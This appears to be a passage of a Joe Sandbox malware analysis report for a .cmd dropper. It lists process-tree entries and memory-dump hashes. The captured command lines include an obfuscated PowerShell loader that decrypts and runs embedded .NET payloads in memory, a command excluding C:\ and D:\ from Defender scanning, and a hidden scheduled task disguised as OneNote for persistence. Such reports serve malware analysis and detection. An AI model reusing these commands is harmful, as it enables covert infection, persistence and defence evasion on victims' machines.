                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\SYSTEM32\cmd.exe /c "C:\Users\user\AppData\Roaming\Network28681Man.cmd"
                                      Imagebase:0x7ff780f00000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:16
                                      Start time:14:10:45
                                      Start date:24/04/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:17
                                      Start time:14:10:47
                                      Start date:24/04/2024
                                      Path:C:\Windows\SysWOW64\cmd.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Windows\System32\cmd.exe" /c start "" "C:\Users\user\AppData\Roaming\Network28681Man.cmd"
                                      Imagebase:0x240000
                                      File size:236'544 bytes
                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:18
                                      Start time:14:10:47
                                      Start date:24/04/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:19
                                      Start time:14:10:47
                                      Start date:24/04/2024
                                      Path:C:\Windows\SysWOW64\cmd.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Network28681Man.cmd"
                                      Imagebase:0x240000
                                      File size:236'544 bytes
                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:false

                                      Target ID:20
                                      Start time:14:10:48
                                      Start date:24/04/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:false

                                      Target ID:21
                                      Start time:14:10:48
                                      Start date:24/04/2024
                                      Path:C:\Windows\SysWOW64\cmd.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\AppData\Roaming\Network28681Man.cmd';$EErt='EntqgNmryqgNmPoiqgNmnqgNmtqgNm'.Replace('qgNm', ''),'CIZQNreIZQNatIZQNeDIZQNecIZQNryIZQNptIZQNorIZQN'.Replace('IZQN', ''),'FrobfNZmbfNZBasbfNZe6bfNZ4SbfNZtrbfNZinbfNZgbfNZ'.Replace('bfNZ', ''),'SplJahjitJahj'.Replace('Jahj', ''),'TriPkHansiPkHfiPkHoriPkHmFiPkHiiPkHnaiPkHlBliPkHoiPkHciPkHkiPkH'.Replace('iPkH', ''),'GetKBQbCurKBQbrenKBQbtPKBQbrKBQbocKBQbessKBQb'.Replace('KBQb', ''),'RyOcoeyOcoadyOcoLyOcoinyOcoesyOco'.Replace('yOco', ''),'LAguzoAguzadAguz'.Replace('Aguz', ''),'EleDcRNmenDcRNtDcRNAtDcRN'.Replace('DcRN', ''),'MalMOMilMOMnlMOMMolMOMdulMOMllMOMelMOM'.Replace('lMOM', ''),'ChaTLERngTLEReETLERxtTLERenTLERsTLERiTLERonTLER'.Replace('TLER', ''),'DeccotGomcotGpcotGrescotGscotG'.Replace('cotG', ''),'CopobqOyobqOTobqOoobqO'.Replace('obqO', ''),'InvClSOokeClSO'.Replace('ClSO', '');powershell -w hidden;function vTzfR($ukwVU){$hHysF=[System.Security.Cryptography.Aes]::Create();$hHysF.Mode=[System.Security.Cryptography.CipherMode]::CBC;$hHysF.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$hHysF.Key=[System.Convert]::($EErt[2])('zavfxzUUXNH4uECQXv0pvDIOSMJD8RFecmPDqbtRg9g=');$hHysF.IV=[System.Convert]::($EErt[2])('mi6yyZbC4Ex2I6/d7FQcGg==');$ovRQV=$hHysF.($EErt[1])();$BaeOu=$ovRQV.($EErt[4])($ukwVU,0,$ukwVU.Length);$ovRQV.Dispose();$hHysF.Dispose();$BaeOu;}function YlNft($ukwVU){$RVhbp=New-Object System.IO.MemoryStream(,$ukwVU);$YhZKJ=New-Object System.IO.MemoryStream;$XoHSZ=New-Object System.IO.Compression.GZipStream($RVhbp,[IO.Compression.CompressionMode]::($EErt[11]));$XoHSZ.($EErt[12])($YhZKJ);$XoHSZ.Dispose();$RVhbp.Dispose();$YhZKJ.Dispose();$YhZKJ.ToArray();}$JBgWB=[System.IO.File]::($EErt[6])([Console]::Title);$vBlXi=YlNft (vTzfR ([Convert]::($EErt[2])([System.Linq.Enumerable]::($EErt[8])($JBgWB, 5).Substring(2))));$kasXC=YlNft (vTzfR 
([Convert]::($EErt[2])([System.Linq.Enumerable]::($EErt[8])($JBgWB, 6).Substring(2))));[System.Reflection.Assembly]::($EErt[7])([byte[]]$kasXC).($EErt[0]).($EErt[13])($null,$null);[System.Reflection.Assembly]::($EErt[7])([byte[]]$vBlXi).($EErt[0]).($EErt[13])($null,$null); "
                                      Imagebase:0x240000
                                      File size:236'544 bytes
                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:22
                                      Start time:14:10:48
                                      Start date:24/04/2024
                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      Imagebase:0xf40000
                                      File size:433'152 bytes
                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:false

                                      Target ID:23
                                      Start time:14:10:48
                                      Start date:24/04/2024
                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
                                      Imagebase:0xf40000
                                      File size:433'152 bytes
                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:26
                                      Start time:14:10:51
                                      Start date:24/04/2024
                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\')
                                      Imagebase:0xf40000
                                      File size:433'152 bytes
                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:27
                                      Start time:14:10:51
                                      Start date:24/04/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:28
                                      Start time:14:10:58
                                      Start date:24/04/2024
                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\user\AppData\Roaming\Network28681Man')
                                      Imagebase:0xf40000
                                      File size:433'152 bytes
                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:29
                                      Start time:14:10:58
                                      Start date:24/04/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:30
                                      Start time:14:11:09
                                      Start date:24/04/2024
                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote 28681' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\Network28681Man.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
                                      Imagebase:0xf40000
                                      File size:433'152 bytes
                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:31
                                      Start time:14:11:09
                                      Start date:24/04/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1670517103.0000000003660000.00000040.00000800.00020000.00000000.sdmp, Offset: 03660000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_3660000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 10d7d4bc48e138ee20e93fd72dd88094fb9c148c205ceedd614bf907eef02bb5
                                        • Instruction ID: 75c883e3fef4aa73858f4ad4e7cd399d53d7bf897567cd786395bdd6a8fae0e3
                                        • Opcode Fuzzy Hash: 10d7d4bc48e138ee20e93fd72dd88094fb9c148c205ceedd614bf907eef02bb5
                                        • Instruction Fuzzy Hash: D7A18F70A002099FCB15CF5DC9949AEFBB1FF89350B248AA9D815AB365C736FC51CB90
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1670517103.0000000003660000.00000040.00000800.00020000.00000000.sdmp, Offset: 03660000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_3660000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1c83a1af4e5192ff8df7357e292b3882060d9f3918a574338b4a34b31b572760
                                        • Instruction ID: bffe8a2c3e0baf18bc145d28f0429b16195b681dc1e856a640bd7ebd6d5eab9c
                                        • Opcode Fuzzy Hash: 1c83a1af4e5192ff8df7357e292b3882060d9f3918a574338b4a34b31b572760
                                        • Instruction Fuzzy Hash: 2B4137B4A006099FCB09CF58C5A8DAAFBB1FF48354B258599D815AB364C736FC51CFA0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1670517103.0000000003660000.00000040.00000800.00020000.00000000.sdmp, Offset: 03660000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_3660000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7fdcbc47069e917d9ac8fdd2daf60d05ec29972b619506abcf5375cb80106e0f
                                        • Instruction ID: 0bf561947953f2b36f0abdf1b64b1b7668d6ebed11ab846c2aa172e53d7941a0
                                        • Opcode Fuzzy Hash: 7fdcbc47069e917d9ac8fdd2daf60d05ec29972b619506abcf5375cb80106e0f
                                        • Instruction Fuzzy Hash: 70317A74A042499FCB01DF5CC9909AAFBF1FF49310B2581AAD849EB362C735EC45CBA1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1670517103.0000000003660000.00000040.00000800.00020000.00000000.sdmp, Offset: 03660000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_3660000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9bdf3e5c3ccdbcaafc4377153b34ed36bc49d5a61552a4c3faf650e3db1e054b
                                        • Instruction ID: e16c45491a81419e7179fd1f8291dc4ace691cbd4746d37be9f12055f6ca8ccf
                                        • Opcode Fuzzy Hash: 9bdf3e5c3ccdbcaafc4377153b34ed36bc49d5a61552a4c3faf650e3db1e054b
                                        • Instruction Fuzzy Hash: 2E212AB4A002099FCB04CF5DC9909AAFBB1FF49310B258599E819EB365C735EC41CBA0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1670383910.00000000035FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 035FD000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_35fd000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2ca34129eead52205ba4c7fd540173439b656fdf427ec2a9f833bf86880cd1fc
                                        • Instruction ID: a282ff2164b56361ea7ebf1a7c18282e1dd749612182885830905f2eff74580e
                                        • Opcode Fuzzy Hash: 2ca34129eead52205ba4c7fd540173439b656fdf427ec2a9f833bf86880cd1fc
                                        • Instruction Fuzzy Hash: D401F731008300AFE710CA26E984767FFECFF41324F0CC96AEE084B15AD2799841C6B1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1670383910.00000000035FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 035FD000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_35fd000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2dbbfbfd2075c9318fcdfdec7cf849b982be52c09c18004be663cec76cc7c884
                                        • Instruction ID: 278d87a35dd1acfe3a587090ec52b434f24ba4f7d1f2b941d0bbce84fc365b39
                                        • Opcode Fuzzy Hash: 2dbbfbfd2075c9318fcdfdec7cf849b982be52c09c18004be663cec76cc7c884
                                        • Instruction Fuzzy Hash: CD01407100E3C09FD7128B25D894B56BFB8EF43224F1D84DBD9888F1A7C2699849C772
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1704833447.0000000004470000.00000040.00000800.00020000.00000000.sdmp, Offset: 04470000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_4470000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: KUdn^$[Udn^$kUdn^${Udn^$\dn^
                                        • API String ID: 0-3394041775
                                        • Opcode ID: c394dc7b2f9865c0c82101df43ea8b99deb99c1c5e5479f207238ebabc93981f
                                        • Instruction ID: 1496692e91c62c679df197e8115259e86967cacbaf5629b80453dd7d89aefb31
                                        • Opcode Fuzzy Hash: c394dc7b2f9865c0c82101df43ea8b99deb99c1c5e5479f207238ebabc93981f
                                        • Instruction Fuzzy Hash: 119177B1B006595BDB5AEFB4C8156AEB7E2EF84704B00891DD50AAB340DF746E0A8BC5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1704833447.0000000004470000.00000040.00000800.00020000.00000000.sdmp, Offset: 04470000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_4470000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: KUdn^$[Udn^$kUdn^${Udn^$\dn^
                                        • API String ID: 0-3394041775
                                        • Opcode ID: 1fdceaa6ead1005bc36b00ea3ae2724a3bde3e74489dadae24e8fa7b5f28fc80
                                        • Instruction ID: 9b3c8a2730e0eeb002aaef9efdb6af7fea531725dc7b3aaa5a8bc9ec75535b14
                                        • Opcode Fuzzy Hash: 1fdceaa6ead1005bc36b00ea3ae2724a3bde3e74489dadae24e8fa7b5f28fc80
                                        • Instruction Fuzzy Hash: 5A9176B1B007595BDB5AEFB4C8156AEB7E2EF84704B00891DD50ABB340DF746E0A8BC5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1704833447.0000000004470000.00000040.00000800.00020000.00000000.sdmp, Offset: 04470000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_4470000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: KUdn^$[Udn^$kUdn^${Udn^$\dn^
                                        • API String ID: 0-3394041775
                                        • Opcode ID: b075fdf465e482cad5c6325dce35dae51419236ef7d560f6e27ad28af158c86f
                                        • Instruction ID: 959f7bf75fac6ebe3735980d7e7fff035510bda8ec3468ae46e6015575ad167b
                                        • Opcode Fuzzy Hash: b075fdf465e482cad5c6325dce35dae51419236ef7d560f6e27ad28af158c86f
                                        • Instruction Fuzzy Hash: 778179B1B007595BDB1AEFB4C8155AEB7E2EF84704B00891DD51AAB340DF746E0B8BC6
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1714505266.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_70e0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$p5rk$piJk$piJk$piJk$piJk$piJk$tP^q$tP^q$tP^q$tP^q$tP^q$tP^q$|,Lk$#rk$$^q$$^q$$^q$$rk$xl$xl
                                        • API String ID: 0-877694843
                                        • Opcode ID: d46abdc8ec624e52b946e5f2f9b870a0ee31930a1b36f515366994073da36cbc
                                        • Instruction ID: 10dd32f2fe2fd71d1f834d2fd23c822e43ffbe126fbca1669d65dda933447486
                                        • Opcode Fuzzy Hash: d46abdc8ec624e52b946e5f2f9b870a0ee31930a1b36f515366994073da36cbc
                                        • Instruction Fuzzy Hash: ABB278B1B003069FCB659B78890566ABFEEBFC6310F1486BAD455CB351DB31C885C7A1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1714505266.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_70e0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 4'^q$4'^q$4'^q$4'^q
                                        • API String ID: 0-1420252700
                                        • Opcode ID: fdee32f10418164741e571ae85cf43e7b714a797cf3beeb72188d9c599655168
                                        • Instruction ID: d70f9066f19763023978b73e96b7598b3637e95938b0681e8bd18fced238b9ff
                                        • Opcode Fuzzy Hash: fdee32f10418164741e571ae85cf43e7b714a797cf3beeb72188d9c599655168
                                        • Instruction Fuzzy Hash: F21257B1B042568FCB658A78990166BBFEAAFC1310F1486BAF515CB351DB32CC85C7E1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1704833447.0000000004470000.00000040.00000800.00020000.00000000.sdmp, Offset: 04470000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_4470000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: (bq
                                        • API String ID: 0-149360118
                                        • Opcode ID: ee6663aeeddf922da29601914b4a82375bf7c22ecddf89563a4bfdbb9367e51f
                                        • Instruction ID: b07dd154dc1ec53051316ead0d53d313770f6bc133149a313b102ed5fcfccd77
                                        • Opcode Fuzzy Hash: ee6663aeeddf922da29601914b4a82375bf7c22ecddf89563a4bfdbb9367e51f
                                        • Instruction Fuzzy Hash: A5412D34B042458FCB15DFA9C864AAEBBF1EF8D711F5544A9E406AB391DB31ED02CB60
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1704833447.0000000004470000.00000040.00000800.00020000.00000000.sdmp, Offset: 04470000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_4470000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: piJk
                                        • API String ID: 0-3716911216
                                        • Opcode ID: f6ea09e076c14b4eb16da184af7285e3304d08910852ea232289a9e047e70554
                                        • Instruction ID: 1fec1cb3c76e9a87ac338605bbe17c0075afa917a5282a5527848e46e8ea9a37
                                        • Opcode Fuzzy Hash: f6ea09e076c14b4eb16da184af7285e3304d08910852ea232289a9e047e70554
                                        • Instruction Fuzzy Hash: 30314D70A00605DFCB14DF79D994A9EBBF1FF48340F108669D419A73A4DB34AD49CB91
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1704833447.0000000004470000.00000040.00000800.00020000.00000000.sdmp, Offset: 04470000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_4470000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: piJk
                                        • API String ID: 0-3716911216
                                        • Opcode ID: f69d2f99194a69c59ab7e91cfa2febbca2b88ba4688962c5931c9b05fda38a6b
                                        • Instruction ID: 829a2942fc96f5dcda09aa72893e8995e45829518d5f8d82dcff748a8e29ef8d
                                        • Opcode Fuzzy Hash: f69d2f99194a69c59ab7e91cfa2febbca2b88ba4688962c5931c9b05fda38a6b
                                        • Instruction Fuzzy Hash: 32316E70A00605DFCB14DF79D994A9EBBF2FF88340F108669D419A73A4DB34AD49CB91
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1704833447.0000000004470000.00000040.00000800.00020000.00000000.sdmp, Offset: 04470000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_4470000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: (&^q
                                        • API String ID: 0-2067289071
                                        • Opcode ID: 01ec5637b7bc95e8036f5db7b3c16ee83fcb75fdf1004b280d5f1b387dba2077
                                        • Instruction ID: 87bbfc1a4652d092cb32f6a6f7eaf6cc9f8da830dd0d4e197b6efe006495fa82
                                        • Opcode Fuzzy Hash: 01ec5637b7bc95e8036f5db7b3c16ee83fcb75fdf1004b280d5f1b387dba2077
                                        • Instruction Fuzzy Hash: BE21F172A002588FCB14DFAED4407DFBBF5EB88320F14842AD418E7300CB75A9068FA4
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1704833447.0000000004470000.00000040.00000800.00020000.00000000.sdmp, Offset: 04470000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_4470000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f156800d4045de4b93daef29f8c3b40e1314b44011b01ae0e3c7f739574f86c6
                                        • Instruction ID: 4de54a046a86abb978f29b3f643ff4546939455bd8bbafe65252eb267670d82e
                                        • Opcode Fuzzy Hash: f156800d4045de4b93daef29f8c3b40e1314b44011b01ae0e3c7f739574f86c6
                                        • Instruction Fuzzy Hash: 4D918F75B002158FCB24DF78C5545AEBBE6AF88700F2445AAE806EB364DF75EC42CB91
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1704833447.0000000004470000.00000040.00000800.00020000.00000000.sdmp, Offset: 04470000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_4470000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 02ce71b469dabc6c432d4239a5ac3728ec38a24d3ac22bb125da3200815b8766
                                        • Instruction ID: 4785c592d91e99114a7e564fe8bea8d8e6ce4e850ba5242692db82f4f3aa63f3
                                        • Opcode Fuzzy Hash: 02ce71b469dabc6c432d4239a5ac3728ec38a24d3ac22bb125da3200815b8766
                                        • Instruction Fuzzy Hash: CD917DB4A002458FCB15CF59C5989AEFBB1FF48310B24859AD815AB365C735FC52CFA0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1704833447.0000000004470000.00000040.00000800.00020000.00000000.sdmp, Offset: 04470000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_4470000_powershell.jbxd
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1714505266.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_70e0000_powershell.jbxd
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1704454571.0000000000E5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E5D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_e5d000_powershell.jbxd
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1704833447.0000000004470000.00000040.00000800.00020000.00000000.sdmp, Offset: 04470000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_4470000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 6873358d98170056203d8381261e6ca55efd5aecbde09a96c6f4f40af175be52
                                        • Instruction ID: 822b6167e619680f520fc6042b36635c8c7fb1b60d7460a52785c3c114376887
                                        • Opcode Fuzzy Hash: 6873358d98170056203d8381261e6ca55efd5aecbde09a96c6f4f40af175be52
                                        • Instruction Fuzzy Hash: 50F028716046045BD3016B7594293EB7BA6DBC1338F14816BD8455B7C2CD3A1986C7E1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1704833447.0000000004470000.00000040.00000800.00020000.00000000.sdmp, Offset: 04470000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_4470000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 43bce8d37ce8a0d2dbfebecf996c576e742e018c75204a7ae53b587e33952302
                                        • Instruction ID: 22fffa198dd39aa78fc3999403df8f57b25d87a036ef6983e44b0e906ece0f51
                                        • Opcode Fuzzy Hash: 43bce8d37ce8a0d2dbfebecf996c576e742e018c75204a7ae53b587e33952302
                                        • Instruction Fuzzy Hash: C6F0B4363053646FD7108A7A9C449BBBFEDEFC9660704417AF944C3351CA70DC0087A0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1704833447.0000000004470000.00000040.00000800.00020000.00000000.sdmp, Offset: 04470000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_4470000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 01ad9ca0acdc7a78b968fb14bf2a6df44e1b52a3c6cef9057ec2ba804b313058
                                        • Instruction ID: 3dfe145714468ef4d5076733948e3165c1028f5ad362c3dcab92899be7e80351
                                        • Opcode Fuzzy Hash: 01ad9ca0acdc7a78b968fb14bf2a6df44e1b52a3c6cef9057ec2ba804b313058
                                        • Instruction Fuzzy Hash: F1F0BE76B105149BCB149669E8015EEFBAADFC8231B00843BD51AEB750DB31A9478BE1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1704833447.0000000004470000.00000040.00000800.00020000.00000000.sdmp, Offset: 04470000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_4470000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
